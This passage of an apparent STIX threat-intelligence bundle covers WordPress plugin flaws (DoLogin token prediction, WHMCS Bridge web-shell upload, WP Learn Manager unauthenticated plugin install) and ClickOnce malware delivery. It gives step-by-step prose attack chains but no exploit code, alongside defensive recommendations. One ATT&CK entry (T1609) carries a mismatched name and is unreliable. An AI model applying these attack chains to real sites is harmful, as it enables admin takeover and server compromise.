      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14495: DoLogin Security Plugin Authentication Bypass via Insufficient Randomness",
      "description": "## Overview\n\nThe DoLogin Security plugin for WordPress, specifically in versions up to and including 4.3, harbors a critical authentication bypass vulnerability, tracked as CVE-2026-14495. This flaw stems from insufficient randomness in the `dologin\\s::rrand()` function, which seeds the Mersenne Twister pseudorandom number generator using only the microsecond component of the current time. This constrains the seed space to approximately 10^6 possible values, making the 32-character magic-link tokens generated from it predictable. An unauthenticated attacker can leverage this weakness to brute-force the limited seed space offline, thereby reconstructing active passwordless login tokens. Successful exploitation allows the attacker to authenticate as any targeted user, including administrators, without a password, as the plugin directly calls `wp_set_auth_cookie()` and bypasses standard authentication and lockout mechanisms. Exploitation requires a valid, unexpired passwordless link to exist for the target, and knowledge or guesswork of the numeric user ID.\n\n## Attack Chain\n\n1.  An attacker identifies a WordPress site utilizing the vulnerable DoLogin Security plugin (version \u003c= 4.3).\n2.  The attacker identifies a target user (e.g., administrator) and obtains a legitimate, unexpired passwordless login link that was previously generated for this user. This link contains a numeric user ID.\n3.  The attacker extracts the numeric user ID from the `?dologin=\u003cid\u003e.\u003chash\u003e` parameter of the observed link.\n4.  The attacker performs an offline brute-force attack against the `mt_srand()` seed space (approximately 10^6 candidates) to reconstruct the `32-character magic-link token` (`\u003chash\u003e`) corresponding to the target user and link generation time.\n5.  The attacker crafts a malicious GET request to the WordPress site, incorporating the target numeric user ID and the successfully reconstructed token in the `?dologin=\u003cid\u003e.\u003creconstructed_hash\u003e` parameter.\n6.  The vulnerable `Pswdless::try_login()` function, registered on the unauthenticated `init` hook, receives and processes this request, comparing the supplied token.\n7.  Upon successful verification (due to the reconstructed token), the plugin directly invokes `wp_set_auth_cookie()`, establishing an authenticated session for the attacker as the target user, bypassing standard `wp_authenticate()` and any lockout mechanisms.\n8.  The attacker gains full control over the WordPress site if the targeted user possessed administrative privileges.\n\n## Impact\n\nThe successful exploitation of CVE-2026-14495 grants unauthenticated attackers complete administrative control over affected WordPress websites. This bypasses all authentication safeguards, allowing attackers to log in as any user, including administrators, without requiring a password. The direct call to `wp_set_auth_cookie()` means that typical login security measures, such as brute-force detection and account lockouts, are bypassed. Consequences include full data exfiltration, website defacement, arbitrary code execution via plugin/theme modifications, introduction of malware, and complete compromise of the web server.\n\n## Recommendation\n\n*   **Patch CVE-2026-14495** immediately by updating the DoLogin Security plugin to a version greater than 4.3 or to the latest available version as provided by the vendor.\n*   **Review web server access logs** for unusual or repeated GET requests containing the `dologin` parameter, specifically targeting administrator user IDs.\n*   **Implement web application firewall (WAF)** rules to monitor and potentially block requests attempting to exploit CVE-2026-14495, though specific patterns might be difficult to distinguish from legitimate use.\n",
      "published": "2026-07-08T06:23:36Z",
      "labels": [
        "wordpress",
        "plugin",
        "authentication-bypass",
        "web-exploitation",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14495"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4cc2071f-1344-5619-860f-7015c5e4eb3a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4a55e284-7cc7-5cda-a168-2b3e7952d375",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de3c93a6-c63c-5f8f-8ea3-4823050dacfb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4a55e284-7cc7-5cda-a168-2b3e7952d375",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bd875342-0c00-5eaf-9fc6-290ea891ae27",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1609",
          "url": "https://attack.mitre.org/techniques/T1609"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5a877eb-4f9e-542c-8920-ec51bf8c99cc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4a55e284-7cc7-5cda-a168-2b3e7952d375",
      "target_ref": "attack-pattern--bd875342-0c00-5eaf-9fc6-290ea891ae27"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4a55e284-7cc7-5cda-a168-2b3e7952d375",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14489: WHMCS Bridge Plugin Arbitrary File Upload Leads to RCE",
      "description": "## Overview\n\nCVE-2026-14489 details a critical arbitrary file upload vulnerability affecting the WHMCS Bridge plugin for WordPress, specifically in all versions up to and including 6.9. This flaw stems from inadequate file type validation within the `connect()` function, enabling authenticated attackers with at least \"Custom-level\" access to upload malicious files onto the compromised web server. Such capabilities pave the way for potential remote code execution (RCE) on the underlying system. The vulnerability carries a CVSS v3.1 Base Score of 8.8 (High), highlighting its severe impact. Organizations utilizing the WHMCS Bridge plugin must prioritize patching to mitigate the risk of server compromise and unauthorized data access.\n\n## Attack Chain\n\n1.  An attacker gains authenticated access to a WordPress site running the WHMCS Bridge plugin, with privileges of \"Custom-level\" or higher.\n2.  The attacker crafts a specialized HTTP POST request targeting an endpoint that utilizes the vulnerable `connect()` function within the WHMCS Bridge plugin.\n3.  This request includes a payload containing a malicious file, such as a PHP web shell, disguised to bypass any existing, but insufficient, server-side checks.\n4.  Due to the missing file type validation (CWE-434) in the `connect()` function, the WHMCS Bridge plugin processes and uploads the malicious file to the web server's filesystem.\n5.  The attacker then issues a subsequent HTTP request to the location where the malicious file was uploaded (e.g., `/wp-content/uploads/whmcs-bridge/malicious.php`).\n6.  The web server executes the malicious PHP file, granting the attacker remote code execution capabilities on the compromised server.\n7.  With RCE, the attacker can establish persistence, exfiltrate sensitive data, or further compromise the hosting environment.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14489 allows an authenticated attacker to achieve remote code execution on the affected web server. This can lead to complete compromise of the WordPress site, including web defacement, unauthorized data exfiltration (e.g., database credentials, user information), installation of backdoors for persistence, and potentially lateral movement within the hosting environment. Such an attack could result in significant reputational damage, regulatory fines, and extensive remediation costs for affected organizations. While no specific victim counts or sectors are currently identified, WordPress sites using the vulnerable plugin are at risk.\n\n## Recommendation\n\n*   Immediately apply the latest security updates for the WHMCS Bridge plugin that address CVE-2026-14489. If an update is not available, consider disabling or uninstalling the plugin until a fix is released.\n*   Implement robust web application firewall (WAF) rules to detect and block suspicious file uploads, particularly those containing executable extensions (`.php`, `.phtml`, `.phar`) to plugin directories on your webserver.\n*   Enable comprehensive webserver access logging (e.g., Apache, Nginx) to capture `cs-uri-stem`, `cs-uri-query`, `cs-method`, and `sc-status` for all requests, specifically monitoring for anomalous POST requests to `/wp-content/plugins/whmcs-bridge/` followed by GET requests to newly created executable files.\n*   Regularly review file integrity monitoring (FIM) logs for unauthorized modifications or creations of files in web-accessible directories, especially `wp-content`.\n",
      "published": "2026-07-08T06:22:32Z",
      "labels": [
        "wordpress",
        "arbitrary-file-upload",
        "remote-code-execution",
        "web-vulnerability",
        "plugin-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
        "attack-pattern--bd875342-0c00-5eaf-9fc6-290ea891ae27"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14489"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c4fe6dcc-93c8-4956-85ae-a1125bc84509?source=cve"
        },
        {
          "source_name": "reference",
          "url": "https://plugins.trac.wordpress.org/browser/whmcs-bridge/tags/6.9/bridge.init.php#L482"
        },
        {
          "source_name": "reference",
          "url": "https://plugins.trac.wordpress.org/browser/whmcs-bridge/tags/6.9/includes/request.class.php#L296"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3327dc74-809c-5348-a607-1586b5a38a31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b6247633-303c-541e-8a68-9684917a0854",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2549029-7c27-56d3-bed7-3e4c28bf0c8a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b6247633-303c-541e-8a68-9684917a0854",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b6247633-303c-541e-8a68-9684917a0854",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-12153 — WP Learn Manager Plugin Authorization Bypass",
      "description": "## Overview\n\nCVE-2026-12153 addresses a critical authorization bypass vulnerability affecting all versions of the WP Learn Manager plugin for WordPress, specifically up to and including 1.1.8. The flaw stems from the plugin's failure to adequately verify user authorization prior to executing certain actions. This critical oversight enables unauthenticated attackers to leverage vulnerable endpoints to install and activate arbitrary plugins directly from the WordPress.org repository on the compromised site. The ability to install and activate arbitrary plugins provides a clear path to achieving unauthenticated Remote Code Execution (RCE) or complete site takeover by installing a malicious plugin. This vulnerability poses a severe risk to WordPress sites utilizing the affected plugin, allowing attackers to gain control without requiring any prior authentication or credentials.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a WordPress site running the vulnerable WP Learn Manager plugin (version 1.1.8 or earlier).\n2.  The attacker crafts a malicious HTTP POST request targeting the `wp-admin/admin-ajax.php` endpoint, which handles AJAX requests for WordPress and plugins.\n3.  The crafted request includes parameters specifically designed to invoke plugin installation or activation actions, such as `action=install-plugin` or `action=activate-plugin`, exploiting the WP Learn Manager's missing authorization checks.\n4.  The attacker specifies a plugin name or slug from the official WordPress.org repository within the request, which could be a legitimate but vulnerable plugin, or one with known backdoors.\n5.  Due to the authorization bypass in WP Learn Manager, the WordPress core or the plugin proceeds to process the request without verifying the attacker's administrative privileges.\n6.  The WordPress site then downloads, installs, and activates the attacker-specified plugin from the WordPress.org repository.\n7.  Upon activation, if the installed plugin contains malicious code (e.g., a web shell, backdoor, or configuration changes), the attacker gains persistent access or achieves unauthenticated Remote Code Execution (RCE) on the server.\n8.  The attacker can then perform further malicious actions, such as data exfiltration, defacement, or embedding malware for visitor compromise.\n\n## Impact\n\nThe impact of successful exploitation of CVE-2026-12153 is severe, rated with a CVSS v3.1 base score of 9.8 (Critical). An unauthenticated attacker can achieve complete compromise of the affected WordPress site, potentially leading to unauthenticated Remote Code Execution (RCE). This could result in unauthorized access to sensitive data, website defacement, arbitrary code execution on the underlying server, and the ability to inject malware that could infect site visitors. Given the ease of exploitation and the lack of authentication required, affected organizations face a high risk of significant data breaches, operational disruption, and reputational damage if their sites are compromised.\n\n## Recommendation\n\n*   Immediately update the WP Learn Manager plugin to a patched version beyond 1.1.8 to remediate CVE-2026-12153.\n*   Deploy the provided Sigma rule to detect attempts at exploiting this authorization bypass on your web server logs.\n*   Monitor WordPress activity logs for unusual or unauthenticated plugin installations or activations that could indicate successful exploitation.\n*   Regularly review installed plugins and themes on all WordPress sites for legitimacy and remove any unknown or unauthorized components.\n",
      "published": "2026-07-08T06:21:28Z",
      "labels": [
        "wordpress",
        "plugin",
        "authorization-bypass",
        "cve",
        "web-application",
        "critical-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12153"
        },
        {
          "source_name": "reference",
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8cbf5121-2511-4e21-a346-67fa1e34fc02?source=cve"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e61fae0c-5ef2-5dbc-9eea-64973b8f0dce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cbacbb55-71e5-55c6-8442-7f5b62226e54",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0241eed1-4035-5991-927c-0ea0a080c95a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cbacbb55-71e5-55c6-8442-7f5b62226e54",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cbacbb55-71e5-55c6-8442-7f5b62226e54",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Understanding ClickOnce Technology Abuse: Part 1",
      "description": "## Overview\n\nMicrosoft's ClickOnce technology, designed for simplified application distribution and updating, is being actively abused by threat actors to spread malware. This deployment mechanism allows developers to package and deliver applications that users can run, install, and automatically update with minimal interaction and without requiring administrative privileges. While intended to streamline legitimate software deployment, its user-friendly nature makes it a \"double-edged sword,\" providing an easy vector for malicious payloads. This initial brief, Part 1 of a two-part series, focuses on the internal workings of ClickOnce technology, detailing the process from application publication to installation on the user's endpoint, laying the groundwork for understanding how adversaries weaponize this feature.\n\n## Attack Chain\n\n1. Threat actors publish a malicious application using the ClickOnce technology, generating ClickOnce deployment files (e.g., `.application` manifest) configured for malware delivery.\n2. The malicious ClickOnce deployment files are hosted on attacker-controlled websites or network shares, impersonating legitimate software or updates.\n3. A user is socially engineered or lured to click an \"Install\" button or a link pointing to the malicious ClickOnce deployment file.\n4. The user's system downloads the `.application` manifest file and associated application files.\n5. The operating system may display a security prompt or confirmation dialog to the user, especially if the publisher's signature is untrusted or missing.\n6. The user confirms or bypasses the security prompt, which initiates the ClickOnce deployment process via `dfsvc.exe`.\n7. The malicious ClickOnce application is executed on the user's system and optionally installed into the `C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Apps\\2.0\\` directory, often without requiring administrative privileges.\n8. The deployed malicious application proceeds to deliver its payload, leading to unauthorized code execution, system compromise, or further malware installation.\n\n## Impact\n\nThe abuse of ClickOnce technology allows threat actors to bypass traditional security controls that rely on administrative privileges for software installation. Successful exploitation can lead to the silent deployment of malware, including but not limited to ransomware, infostealers, or remote access Trojans. Victims face potential data exfiltration, system damage, disruption of operations, and further lateral movement within their networks. The seamless, user-driven nature of ClickOnce deployments makes it an effective initial access and execution vector, increasing the risk of widespread compromise.\n\n## Recommendation\n\n* Enable `process_creation` logging to monitor for suspicious invocations or child processes of `dfsvc.exe`, which is integral to ClickOnce deployments.\n* Implement `file_event` logging for the `C:\\Users\\*\\AppData\\Local\\Apps\\2.0\\` directory to track the creation and modification of ClickOnce application files, as this is a common installation path.\n* Monitor `network_connection` logs for outbound connections initiated by `dfsvc.exe` or applications installed in `C:\\Users\\*\\AppData\\Local\\Apps\\2.0\\` to unusual or untrusted external destinations.\n",
      "published": "2026-07-08T08:08:13Z",
      "labels": [
        "clickonce",
        "malware-delivery",
        "windows",
        "endpoint"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--62a4bd2e-3eea-5974-b96c-78110fd2405f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fd4aedfb-c2c7-5559-ae66-fd0485a5933e",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--649ce53f-6479-50a9-8f53-d5264ccf1e9d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fd4aedfb-c2c7-5559-ae66-fd0485a5933e",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fd4aedfb-c2c7-5559-ae66-fd0485a5933e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse of Microsoft ClickOnce Technology Explained, Part 1",
      "description": "## Overview\n\nCrowdStrike researchers have published the first part of a series detailing the new abuse potential of Microsoft's ClickOnce technology. Released on June 18, 2026, this initial analysis focuses on the legitimate internal mechanics of ClickOnce, a Microsoft deployment solution designed to simplify application distribution and updates on Windows systems. ClickOnce enables applications to be run or installed with minimal user interaction and often without requiring administrative privileges, making it a \"double-edged sword\" as it presents an attractive pathway for threat actors to bypass traditional security controls and deploy malicious software. The article dissects the entire process, from application publishing via Visual Studio, including the generation of ClickOnce deployment manifests (.application files), to its self-updating capabilities. This foundational understanding is crucial for defenders to comprehend how this legitimate feature could be weaponized for initial access and execution, setting the groundwork for subsequent parts of the series that will discuss specific abuse patterns.\n\n## Impact\n\nThe potential abuse of ClickOnce technology could lead to widespread malware distribution, bypassing traditional installation barriers by leveraging a trusted Microsoft deployment mechanism. Given its design for minimal user interaction and often privilege-free installation, attackers could achieve initial execution and persistence on targeted Windows systems with relative ease. This could facilitate various malicious outcomes, including data exfiltration, ransomware deployment, or further network compromise, impacting any organization whose users download and execute ClickOnce applications from untrusted sources. The user-friendly nature, which eliminates elevated privilege requirements and simplifies updates, makes it an attractive method for adversaries to establish a foothold without raising immediate suspicion.\n\n## Recommendation\n\n*   Enable `process_creation` logging for Windows endpoints to monitor the execution of `dfsvc.exe` and its child processes, which are central to ClickOnce application deployment and execution.\n*   Implement application whitelisting policies to prevent the execution of unsigned or untrusted ClickOnce applications, significantly reducing the attack surface.\n*   Enable `file_event` logging on Windows endpoints to detect the creation of `.application` manifest files and associated ClickOnce cache entries, which typically reside under the user's `AppData` directory.\n*   Educate end-users on the risks associated with installing software from untrusted sources, even when presented via seemingly legitimate ClickOnce prompts.\n",
      "published": "2026-07-08T06:14:50Z",
      "labels": [
        "clickonce",
        "windows",
        "deployment",
        "malware-distribution",
        "initial-access",
        "execution"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a74d759c-2951-57e7-a607-9d27b0cba617",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--14f0a751-6f66-5668-bffc-1bb102454920",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6789422a-406e-549f-940b-3c741a172c6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c3632980-8916-5ff2-8b08-6e6351ce64ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--795e0dc0-384c-5fff-a1a3-4ec9857c249d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Access Token Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1134",
          "url": "https://attack.mitre.org/techniques/T1134"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e2bc3e3d-46ea-559f-932d-775288f0719a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--795e0dc0-384c-5fff-a1a3-4ec9857c249d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2957e251-739e-5bea-8dec-0fe42ce8ffd8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f1b8a286-147c-56cf-b248-5897282a007c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7bcfea81-adde-5aee-bcb2-a18a0b4c3196",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--378318ba-b62a-51b3-b8e0-94f15697bb72",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "New Abuse of ClickOnce Technology for Malware Delivery and Persistence",
